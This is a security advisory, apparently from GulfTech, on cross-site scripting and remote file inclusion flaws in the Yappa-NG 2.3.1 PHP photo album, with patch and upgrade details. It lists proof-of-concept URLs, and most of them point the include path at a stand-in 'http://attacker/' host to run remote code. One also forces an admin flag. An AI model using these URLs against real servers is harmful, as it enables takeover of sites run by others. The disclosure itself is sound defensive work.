Search | Research | Contact Us Tuesday October 10, 2021
Languages
Most Viewed Items
  1 PHPXMLRPC Library Remote Code Execution
  2 XOOPS 2.0.11 && Earlier Multiple Vulnerabilities
  3 Multiple Invision Power Board Vulnerabilities
  4 Mambo Multiple Vulnerabilities
  5 eBay And Amazon Still Vulnerable
  6 PEAR XML_RPC Library Remote Code Execution
  7 When Small Mistakes Can Cause Big Problems
  8 Woltlab Burning Board SQL Injection Vulnerability
  9 WordPress 1.5.1.2 And Earlier Multiple Vulnerabilities
10 MySQL Eventum Multiple Vulnerabilities
Need Secure Code?
Quick Search
You can use the form below to search our site. Just enter the keywords to search.
Home Services Archives Research Downloads Contact
Yappa-NG Multiple Vulnerabilities
May 11, 2022
Vendor : Fritz Berger
URL : http://sourceforge.net/projects/yappa-ng/
Version : yappa-ng 2.3.1 && Earlier
Risk : Multiple Vulnerabilities


Description:
Yappa-NG is the second generation (new and improved) version of Yappa (yet another php photo album). There are several vulnerabilities in Yappa-NG that may allow an attacker to possibly take control of the vulnerable server. In order to exploit these vulnerabilities register_globals must be on. An updated version of Yappa-NG is available, and users should upgrade as soon as possible.


Cross Site Scripting:
Cross site scripting exists in Yappa-NG. This vulnerability exists due to user supplied input not being checked properly.

http://host/admin_modules/admin_module_info.inc.php?lang_akt[admin_ainfo_hmain]=[XSS]
http://host/src/index_footer-copyright.inc.php?config[release]=[XSS]
http://host/src/index_thumbs.inc.php?page[thumb_table_width]=[XSS]

This vulnerability could be used to steal cookie based authentication credentials within the scope of the current domain, or render hostile code in a victim's browser.


Arbitrary File Inclusion:
Yappa-NG is prone to both remote and local file include vulnerabilities which may allow for an attacker to execute arbitrary commands on the victim webserver by including malicious files.

http://host/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://attacker/
http://host/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://attacker/
http://host/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://attacker/
http://host/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://attacker/
http://host/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://attacker/
http://host/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://attacker/
http://host/src/index_overview.inc.php?config[path_src_include]=http://attacker/
http://host/src/image-gd.class.php?config[path_src_include]=http://attacker/
http://host/src/image.class.php?config[path_src_include]=http://attacker/&config;[image_module]=blah
http://host/src/album.class.php?config[path_src_include]=http://attacker/
http://host/src/show_random.inc.php?config[path_src_include]=http://attacker/
http://host/src/main.inc.php?config[path_src_include]=http://attacker/
http://host/src/index_passwd-admin.inc.php?admin_ok=1&config;[path_admin_include]=http://attacker/

If globals are set to on, and no include restrictions are in effect then we can include any php code of our choice remotely. Of course the server hosting the malicious file to be included could not have php enabled, or the file would be parsed before it reached the victim server. This issue is very dangerous when present, but regardless of your server configuration you are still encouraged to upgrade immediately.


Solution:
The developer was contacted quite some time ago, and a patch has been available for several weeks. The patch can be found here.

https://sourceforge.net/project/showfiles.php?group_id=70802

All Yappa-NG users are advised to upgrade immediately.


Credits:
James Bercegay of the GulfTech Security Research Team